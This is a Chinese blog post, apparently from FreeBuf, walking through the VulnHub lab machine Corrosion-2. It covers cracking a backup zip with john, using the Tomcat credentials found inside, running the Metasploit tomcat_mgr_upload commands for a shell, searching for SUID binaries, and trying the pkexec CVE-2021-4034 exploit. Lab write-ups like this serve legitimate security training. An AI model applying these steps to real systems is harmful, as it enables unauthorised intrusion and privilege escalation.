freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

攻防一练(CORROSION-2)
likenet 2024-01-08 17:26:36 128631

靶场下载地址

https://www.vulnhub.com/entry/corrosion-2,745/

查看本机ip

1704244625_6594b591556a484f77e44.png!small

扫描靶机ip

1704244681_6594b5c9e834ca01a3268.png!small

靶机ip192.168.78.131

扫描开放端口

1704415135_65974f9f6dea601ac402c.png!small

发现22、80、8080端口

访问80端口

1704415243_6597500b9ba8d6764d0f6.png!small

深度扫描端口及信息

1704414415_65974ccf0c5cf87b46892.png!small

发现一个backup.zip文件,将他下载到本地

1704414461_65974cfd9a7d108f1331e.png!small

打开这个zip文件发现需要输入密码

1704414493_65974d1dbd38786d96134.png!small

使用工具john爆破zip文件

1704415995_659752fb995b573a9b681.png!small

1704416057_65975339574d98d65e6dc.png!small

拿到密码

@administrator_hi5

访问文件tomcat-users.xml拿到两个账号密码

1704416737_659755e1ec4e7ab067ca2.png!small

manager

melehifokivai

admin

melehidokivai

访问8080端口并登录

1704416996_659756e48b4c961d812cf.png!small

发现 msfconsole 中有一个可以 getshell 的模块配合账号密码即可。

use exploit/multi/http/tomcat_mgr_upload

set rport 8080

set rhosts 192.168.78.131

set httpusername admin

set httppassword melehifokivai

set FingerprintCheck false

run

run之后输入shell查看id发现是tomcat用户

1704418398_65975c5ecedad407bab28.png!small

查看python版本

1704419125_65975f351f377010679b0.png!small

将伪终端改变为真终端

1704419138_65975f42aa96edf3359e4.png!small

在home目录下有两个用户名

jaye

randy

1704698414_659ba22ed62573b85ac57.png!small

查看randy目录下的user.txt文件拿到第一个flag
1704698496_659ba28099a1ab2badead.png!small

这里尝试登录jaye用户

su jaye

melehifokivai

python3 -c 'import pty;pty.spawn("/bin/bash")'

1704698736_659ba370474bb60408c38.png!small

find / -perm -u=s -type f 2 > /dev/null

1704699404_659ba60c4cd5fe5bdd42f.png!small

查找 具有 SUID 的命令发现了一个熟悉的: polkit-agent-helper-1cve编号:
CVE-2021-4034

https://github.com/berdav/CVE-2021-4034

下载压缩包到kali中

解压编译压缩包

1704705708_659bbeac72c875c3b8411.png!small

开启一个本地服务

1704703111_659bb48777ad5d3f8a9f5.png!small

将解压过的压缩包上传

1704705763_659bbee3ed0621a1cb83b.png!small

解压运行

1704705810_659bbf12d8ba9e0571e56.png!small

由于GLIBC_2.34版本原因没有运行成功,所以大家运行是注意一下

这里运行成功是可以拿到权限的

还有一种方式是越权访问文件提权

# 渗透测试 # web安全 # 网络安全技术
本文为 likenet 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
攻防一练
likenet LV.4
这家伙太懒了,还未填写个人描述!
  • 12 文章数
  • 11 关注者
攻防一练(BEELZEBUB: 1)
2024-01-30
攻防一练(DOUBLETROUBLE: 1)
2024-01-30
攻防一练(DRIPPING BLUES: 1)
2024-01-24